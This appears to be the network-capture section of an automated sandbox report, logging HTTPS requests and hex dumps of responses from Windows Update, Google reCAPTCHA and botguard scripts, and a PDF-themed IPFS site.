                                              2024-09-27 06:18:09 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d3K15243hDxEmop&MD=Yz1dXwpp HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                              Host: slscr.update.microsoft.com
                                              2024-09-27 06:18:09 UTC560INHTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: application/octet-stream
                                              Expires: -1
                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                              MS-CorrelationId: a89177a0-cac1-49be-a9fc-6e4191b81d6d
                                              MS-RequestId: 64379b4f-1d36-498f-a0ef-c1c15d3cb68f
                                              MS-CV: j7cZmPqWWUKpTEmw.0
                                              X-Microsoft-SLSClientCache: 2880
                                              Content-Disposition: attachment; filename=environment.cab
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 27 Sep 2024 06:18:09 GMT
                                              Connection: close
                                              Content-Length: 24490
                                              2024-09-27 06:18:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                              2024-09-27 06:18:09 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449761216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:09 UTC856OUTGET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: same-origin
                                              Sec-Fetch-Dest: worker
                                              Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2d
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:10 UTC917INHTTP/1.1 200 OK
                                              Content-Type: text/javascript; charset=utf-8
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Expires: Fri, 27 Sep 2024 06:18:09 GMT
                                              Date: Fri, 27 Sep 2024 06:18:09 GMT
                                              Cache-Control: private, max-age=300
                                              Cross-Origin-Resource-Policy: same-site
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:18:10 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 78 64 73 30 72 7a 47 72 6b 74 52 38 38 75 45 5a 32 4a 55 76 64 67 4f 59 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                              Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                              2024-09-27 06:18:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449763216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:09 UTC844OUTGET /js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2d
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:10 UTC811INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                              Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                              Content-Length: 18702
                                              X-Content-Type-Options: nosniff
                                              Server: sffe
                                              X-XSS-Protection: 0
                                              Date: Thu, 26 Sep 2024 12:09:53 GMT
                                              Expires: Fri, 26 Sep 2025 12:09:53 GMT
                                              Cache-Control: public, max-age=31536000
                                              Last-Modified: Tue, 17 Sep 2024 15:00:00 GMT
                                              Content-Type: text/javascript
                                              Vary: Accept-Encoding
                                              Age: 65297
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-27 06:18:10 UTC579INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 50 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 69 66 28 21 28 41 3d 28 56 3d 6e 75 6c 6c 2c 4c 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 41 29 7c 7c 21 41 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 56 3b 74 72 79 7b 56 3d 41 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 6b 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 6b 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 6b 7d
                                              Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(V,A){if(!(A=(V=null,L).trustedTypes,A)||!A.createPolicy)return V;try{V=A.createPolicy("bg",{createHTML:k,createScript:k,createScriptURL:k}
                                              2024-09-27 06:18:10 UTC1390INData Raw: 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 6f 6b 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 29 7b 69 66 28 56 2e 6c 65 6e 67 74 68 3d 3d 33 29 7b 66 6f 72 28 67 3d 30 3b 67 3c 33 3b 67 2b 2b 29 41 5b 67 5d 2b 3d 56 5b 67 5d 3b 66 6f 72 28 67 3d 28 56 3d 5b 31 33 2c 38 2c 31 33 2c 31 32 2c 31 36 2c 35 2c 33 2c 31 30 2c 31 35 5d 2c 30 29 3b 67 3c 39 3b 67 2b 2b 29 41 5b 33 5d 28 41 2c 67 25 33 2c 56 5b 67 5d 29 7d 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 29 7b 69 66 28 56 3d 3d 34 37 36 7c 7c 56 3d 3d 31 36 36 29 41 2e 54 5b 56 5d 3f 41 2e 54 5b 56 5d 2e 63 6f 6e 63 61 74 28 67 29 3a 41 2e 54 5b 56 5d 3d 56 7a 28 67 2c 41 29 3b 65 6c 73 65 7b 69 66
                                              Data Ascii: X-License-Identifier: Apache-2.0','*/','var ok=function(V,A,g){if(V.length==3){for(g=0;g<3;g++)A[g]+=V[g];for(g=(V=[13,8,13,12,16,5,3,10,15],0);g<9;g++)A[3](A,g%3,V[g])}},Y=function(V,A,g){if(V==476||V==166)A.T[V]?A.T[V].concat(g):A.T[V]=Vz(g,A);else{if
                                              2024-09-27 06:18:10 UTC1390INData Raw: 76 6f 69 64 20 30 2c 42 29 2c 28 56 2e 44 3d 66 61 6c 73 65 2c 56 29 2e 73 3d 31 2c 5b 5d 29 2c 56 2e 67 3d 5b 5d 2c 56 2e 4f 3d 76 6f 69 64 20 30 2c 56 2e 58 3d 76 6f 69 64 20 30 2c 28 56 2e 49 3d 28 56 2e 42 3d 66 61 6c 73 65 2c 56 2e 54 3d 28 56 2e 53 3d 30 2c 56 2e 4e 5f 3d 30 2c 5b 5d 29 2c 56 2e 6b 69 3d 66 61 6c 73 65 2c 56 2e 4a 3d 30 2c 28 56 2e 6c 3d 56 2c 56 29 2e 47 3d 30 2c 30 29 2c 56 29 2e 58 71 3d 32 35 2c 28 28 56 2e 52 30 3d 28 28 56 2e 6c 5a 3d 5b 5d 2c 56 29 2e 70 71 3d 67 2c 66 61 6c 73 65 29 2c 56 29 2e 43 3d 30 2c 56 29 2e 55 3d 28 56 2e 48 42 3d 38 30 30 31 2c 56 2e 46 3d 30 2c 56 2e 41 3d 6e 75 6c 6c 2c 28 56 2e 6a 3d 5b 5d 2c 56 2e 6f 30 3d 5b 5d 2c 56 2e 4e 3d 28 56 2e 48 3d 76 6f 69 64 20 30 2c 30 29 2c 56 29 2e 68 3d 76 6f 69
                                              Data Ascii: void 0,B),(V.D=false,V).s=1,[]),V.g=[],V.O=void 0,V.X=void 0,(V.I=(V.B=false,V.T=(V.S=0,V.N_=0,[]),V.ki=false,V.J=0,(V.l=V,V).G=0,0),V).Xq=25,((V.R0=((V.lZ=[],V).pq=g,false),V).C=0,V).U=(V.HB=8001,V.F=0,V.A=null,(V.j=[],V.o0=[],V.N=(V.H=void 0,0),V).h=voi
                                              2024-09-27 06:18:10 UTC1390INData Raw: 50 2c 4c 2e 6c 29 29 29 29 29 7d 29 2c 56 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 29 7b 28 4c 3d 28 50 3d 4f 28 4c 29 2c 78 28 50 2c 4c 2e 6c 29 29 2c 4c 29 5b 30 5d 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 4c 5b 31 5d 2c 4c 5b 32 5d 2c 77 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 21 64 28 74 72 75 65 2c 66 61 6c 73 65 2c 4c 2c 50 29 26 26 28 50 3d 46 47 28 4c 29 2c 49 3d 50 2e 71 5f 2c 53 3d 50 2e 64 56 2c 4c 2e 6c 3d 3d 4c 7c 7c 53 3d 3d 4c 2e 6e 71 26 26 49 3d 3d 4c 29 26 26 28 59 28 50 2e 4d 5f 2c 4c 2c 53 2e 61 70 70 6c 79 28 49 2c 50 2e 4b 29 29 2c 4c 2e 55 3d 4c 2e 52 28 29 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 28 50 3d 28 49 3d 28 53 3d 28 50 3d 28 49 3d 4f 28 4c 29 2c
                                              Data Ascii: P,L.l)))))}),V),function(L,P){(L=(P=O(L),x(P,L.l)),L)[0].removeEventListener(L[1],L[2],w)}),function(L,P,I,S){!d(true,false,L,P)&&(P=FG(L),I=P.q_,S=P.dV,L.l==L||S==L.nq&&I==L)&&(Y(P.M_,L,S.apply(I,P.K)),L.U=L.R())})),function(L,P,I,S){(P=(I=(S=(P=(I=O(L),
                                              2024-09-27 06:18:10 UTC1390INData Raw: 29 2c 32 35 34 29 2c 56 2c 66 75 6e 63 74 69 6f 6e 28 4c 29 7b 59 4f 28 4c 2c 33 29 7d 29 2c 56 29 2c 5b 5d 29 2c 32 36 32 29 2c 56 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 59 28 28 50 3d 4f 28 28 53 3d 4f 28 4c 29 2c 4c 29 29 2c 49 3d 4f 28 4c 29 2c 49 29 2c 4c 2c 78 28 53 2c 4c 29 7c 7c 78 28 50 2c 4c 29 29 7d 29 2c 30 29 2c 56 29 2c 36 37 35 29 2c 56 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 59 28 28 50 3d 28 49 3d 28 53 3d 28 49 3d 4f 28 4c 29 2c 4f 28 4c 29 29 2c 78 28 49 2c 4c 29 29 2c 78 29 28 53 2c 4c 29 2c 53 29 2c 4c 2c 50 2b 49 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 29 7b 59 28 28 49 3d 28 50 3d 4f 28 4c 29 2c 4f 28 4c 29 29 2c 49 29 2c 4c 2c 22 22 2b 78 28 50 2c 4c 29 29 7d 29 29 2c 56 29 2c 66
                                              Data Ascii: ),254),V,function(L){YO(L,3)}),V),[]),262),V,function(L,P,I,S){Y((P=O((S=O(L),L)),I=O(L),I),L,x(S,L)||x(P,L))}),0),V),675),V),function(L,P,I,S){Y((P=(I=(S=(I=O(L),O(L)),x(I,L)),x)(S,L),S),L,P+I)}),function(L,P,I){Y((I=(P=O(L),O(L)),I),L,""+x(P,L))})),V),f
                                              2024-09-27 06:18:10 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 72 65 74 75 72 6e 20 41 3d 5a 28 56 29 2c 41 26 31 32 38 26 26 28 41 3d 41 26 31 32 37 7c 5a 28 56 29 3c 3c 37 29 2c 41 7d 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 2c 42 2c 66 2c 62 2c 4c 2c 50 2c 49 2c 53 2c 70 2c 4b 29 7b 69 66 28 70 3d 78 28 34 37 36 2c 67 29 2c 70 3e 3d 67 2e 47 29 74 68 72 6f 77 5b 43 2c 33 31 5d 3b 66 6f 72 28 66 3d 28 42 3d 28 6b 3d 30 2c 67 2e 73 62 2e 6c 65 6e 67 74 68 29 2c 49 3d 41 2c 70 29 3b 49 3e 30 3b 29 53 3d 66 3e 3e 33 2c 62 3d 66 25 38 2c 4a 3d 67 2e 67 5b 53 5d 2c 4c 3d 38 2d 28 62 7c 30 29 2c 4c 3d 4c 3c 49 3f 4c 3a 49 2c 56 26 26 28 4b 3d 67 2c 50 3d 66 2c 4b 2e 48 21 3d 50 3e 3e 36 26 26 28 4b 2e 48 3d 50 3e 3e 36 2c 50 3d 78 28 31 38 33 2c 4b 29 2c 4b 2e
                                              Data Ascii: unction(V,A){return A=Z(V),A&128&&(A=A&127|Z(V)<<7),A},F=function(V,A,g,k,J,B,f,b,L,P,I,S,p,K){if(p=x(476,g),p>=g.G)throw[C,31];for(f=(B=(k=0,g.sb.length),I=A,p);I>0;)S=f>>3,b=f%8,J=g.g[S],L=8-(b|0),L=L<I?L:I,V&&(K=g,P=f,K.H!=P>>6&&(K.H=P>>6,P=x(183,K),K.
                                              2024-09-27 06:18:10 UTC1390INData Raw: 41 7c 30 29 2b 32 29 25 33 5d 2c 56 5b 41 5d 3d 28 56 5b 41 5d 7c 30 29 2d 28 56 5b 28 28 41 7c 30 29 2b 31 29 25 33 5d 7c 30 29 2d 28 6b 7c 30 29 5e 28 41 3d 3d 31 3f 6b 3c 3c 67 3a 6b 3e 3e 3e 67 29 7d 63 61 74 63 68 28 4a 29 7b 74 68 72 6f 77 20 4a 3b 7d 7d 2c 57 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 2c 42 29 7b 69 66 28 56 2e 56 2e 6c 65 6e 67 74 68 29 7b 56 2e 42 3d 28 56 2e 42 26 26 22 3a 54 51 52 3a 54 51 52 3a 22 28 29 2c 74 72 75 65 29 2c 56 2e 51 32 3d 41 3b 74 72 79 7b 4a 3d 56 2e 52 28 29 2c 56 2e 4a 3d 30 2c 56 2e 55 3d 4a 2c 56 2e 53 3d 4a 2c 56 2e 57 3d 30 2c 6b 3d 58 47 28 56 2c 41 29 2c 41 3d 67 3f 30 3a 31 30 2c 42 3d 56 2e 52 28 29 2d 56 2e 53 2c 56 2e 49 2b 3d 42 2c 56 2e 56 32 26 26 56 2e 56 32 28 42 2d 56 2e 46 2c
                                              Data Ascii: A|0)+2)%3],V[A]=(V[A]|0)-(V[((A|0)+1)%3]|0)-(k|0)^(A==1?k<<g:k>>>g)}catch(J){throw J;}},W=function(V,A,g,k,J,B){if(V.V.length){V.B=(V.B&&":TQR:TQR:"(),true),V.Q2=A;try{J=V.R(),V.J=0,V.U=J,V.S=J,V.W=0,k=XG(V,A),A=g?0:10,B=V.R()-V.S,V.I+=B,V.V2&&V.V2(B-V.F,
                                              2024-09-27 06:18:10 UTC1390INData Raw: 73 2e 6e 2b 2b 2c 74 68 69 73 2e 6f 2e 6c 65 6e 67 74 68 3c 35 30 29 3f 74 68 69 73 2e 6f 2e 70 75 73 68 28 6b 29 3a 28 4a 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 4a 3c 35 30 26 26 28 74 68 69 73 2e 6f 5b 4a 5d 3d 6b 29 29 7d 2c 67 29 2e 70 72 6f 74 6f 74 79 70 65 2e 47 58 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 6e 3d 3d 3d 30 29 72 65 74 75 72 6e 5b 30 2c 30 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 4a 29 7b 72 65 74 75 72 6e 20 6b 2d 4a 7d 29 2c 5b 74 68 69 73 2e 6e 2c 74 68 69 73 2e 6f 5b 74 68 69 73 2e 6f 2e 6c 65 6e 67 74 68 3e 3e 31 5d 5d 7d 2c 6e 65 77 20 67 29 2c 6e 65 77 20 67 29 2c 66 75 6e 63 74 69 6f 6e 28 6b
                                              Data Ascii: s.n++,this.o.length<50)?this.o.push(k):(J=Math.floor(Math.random()*this.n),J<50&&(this.o[J]=k))},g).prototype.GX=function(){if(this.n===0)return[0,0];return this.o.sort(function(k,J){return k-J}),[this.n,this.o[this.o.length>>1]]},new g),new g),function(k
                                              2024-09-27 06:18:10 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 67 2e 63 6f 6e 63 61 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 56 3d 6b 7d 2c 67 7d 2c 79 7a 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 29 7b 6c 28 28 67 3d 4f 28 28 6b 3d 4f 28 56 29 2c 56 29 29 2c 67 29 2c 7a 28 78 28 6b 2c 56 29 2c 41 29 2c 56 29 7d 2c 75 51 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 29 7b 72 65 74 75 72 6e 28 59 28 34 37 36 2c 56 2c 28 51 7a 28 56 2c 28 28 6b 3d 78 28 34 37 36 2c 56 29 2c 56 2e 67 26 26 6b 3c 56 2e 47 29 3f 28 59 28 34 37 36 2c 56 2c 56 2e 47 29 2c 50 34 28 56 2c 41 29 29 3a 59 28 34 37 36 2c 56 2c 41 29 2c 67 29 29 2c 6b 29 29 2c 78 29 28 35 34 2c 56 29 7d 2c 77 61 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 72 65 74 75 72 6e 20 56 28 66 75 6e
                                              Data Ascii: nction(){return V},g.concat=function(k){V=k},g},yz=function(V,A,g,k){l((g=O((k=O(V),V)),g),z(x(k,V),A),V)},uQ=function(V,A,g,k){return(Y(476,V,(Qz(V,((k=x(476,V),V.g&&k<V.G)?(Y(476,V,V.G),P4(V,A)):Y(476,V,A),g)),k)),x)(54,V)},wa=function(V,A){return V(fun
                                              2024-09-27 06:18:10 UTC1390INData Raw: 2c 4c 7d 2c 66 7d 2c 4e 78 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 29 7b 66 6f 72 28 56 3d 28 6b 3d 28 4a 3d 56 5b 32 5d 7c 30 2c 30 29 2c 56 5b 33 5d 7c 30 29 3b 6b 3c 31 35 3b 6b 2b 2b 29 41 3d 41 3e 3e 3e 38 7c 41 3c 3c 32 34 2c 56 3d 56 3e 3e 3e 38 7c 56 3c 3c 32 34 2c 41 2b 3d 67 7c 30 2c 41 5e 3d 4a 2b 32 31 33 31 2c 67 3d 67 3c 3c 33 7c 67 3e 3e 3e 32 39 2c 56 2b 3d 4a 7c 30 2c 4a 3d 4a 3c 3c 33 7c 4a 3e 3e 3e 32 39 2c 67 5e 3d 41 2c 56 5e 3d 6b 2b 32 31 33 31 2c 4a 5e 3d 56 3b 72 65 74 75 72 6e 5b 67 3e 3e 3e 32 34 26 32 35 35 2c 67 3e 3e 3e 31 36 26 32 35 35 2c 67 3e 3e 3e 38 26 32 35 35 2c 67 3e 3e 3e 30 26 32 35 35 2c 41 3e 3e 3e 32 34 26 32 35 35 2c 41 3e 3e 3e 31 36 26 32 35 35 2c 41 3e 3e 3e 38 26 32 35 35 2c 41 3e 3e 3e 30
                                              Data Ascii: ,L},f},Nx=function(V,A,g,k,J){for(V=(k=(J=V[2]|0,0),V[3]|0);k<15;k++)A=A>>>8|A<<24,V=V>>>8|V<<24,A+=g|0,A^=J+2131,g=g<<3|g>>>29,V+=J|0,J=J<<3|J>>>29,g^=A,V^=k+2131,J^=V;return[g>>>24&255,g>>>16&255,g>>>8&255,g>>>0&255,A>>>24&255,A>>>16&255,A>>>8&255,A>>>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449768104.26.13.1414433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:10 UTC602OUTGET /favicon.ico HTTP/1.1
                                              Host: pdf-online.on-fleek.app
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://pdf-online.on-fleek.app/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:11 UTC1305INHTTP/1.1 404 Not Found
                                              Date: Fri, 27 Sep 2024 06:18:11 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 192
                                              Connection: close
                                              CF-Ray: 8c995ff9ac7243a3-EWR
                                              CF-Cache-Status: DYNAMIC
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: max-age=60, stale-while-revalidate=3600
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                              Vary: Accept-Encoding
                                              access-control-allow-headers: Content-Type, Range, User-Agent, X-Requested-With
                                              access-control-allow-methods: GET,HEAD,OPTIONS
                                              access-control-expose-headers: Content-Length, Content-Range, X-Chunked-Output, X-Ipfs-Path, X-Ipfs-Roots, X-Stream-Output
                                              Access-Control-Max-Age: 86400
                                              content-security-policy: upgrade-insecure-requests
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-content-type-options: nosniff
                                              x-ipfs-path: /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m/favicon.ico/
                                              x-request-id: 622fcc78f1b14784ecd62e2bc353a3c0
                                              x-xss-protection: 0
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyL2DB2ayCzgiDeRzfdn0HgmcIe4USBs1LNUtzg3SyQSqKH%2Fzy3P06wNalmtcPSflUw%2FSaEablPKxwZmOliR4meZT0E9EcIlzWFIun6NFikklVpC1VXEBDDPgyeKlxqbkXOvRyKgtDq8"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              2024-09-27 06:18:11 UTC64INData Raw: 66 61 69 6c 65 64 20 74 6f 20 72 65 73 6f 6c 76 65 20 2f 69 70 66 73 2f 62 61 66 79 62 65 69 66 6d 62 75 32 74 74 77 61 62 74 69 35 78 70 37 37 79 73 33 78 32 33 76 36 71 64 6b 75 64 35 6e 64
